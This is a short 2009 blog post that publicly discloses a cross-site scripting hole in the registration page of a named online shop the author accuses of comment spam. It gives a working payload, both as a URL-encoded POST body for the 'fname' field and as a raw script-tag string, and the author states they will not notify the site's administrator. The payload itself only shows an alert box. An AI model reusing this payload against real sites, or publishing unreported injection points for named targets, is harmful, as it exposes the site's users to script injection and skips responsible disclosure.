h1

XSSed: softerpore.com

June 21, 2009

New blog, new xss…
Today i found an internet shop which is doing a lot of comment spamming in blogs etc… -> http://www.softerpore.com
It does not took long to find an xss hole in the registration page:
Just post
fname=%22%3E%3CSCrIPT%3Ealert%28%22Yes%2C+I%27m+vulnerable+to+XSS%22%29%3C%2FSCrIPT%3E&lname=&mail=&send=Create+Account
to http://www.softerpore.com/registration/

Or enter
"><SCrIPT>alert("Yes, I'm vulnerable to XSS")</SCrIPT>
to the inputbox you want it to be.

Free Image Hosting at www.ImageShack.us

And no… I will not give damn spammers a link to their website, you have to copy & paste… And in this case I will not send a notice to the administrator. He has enough to do with spamming etc, i don’t want to disturb him…

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: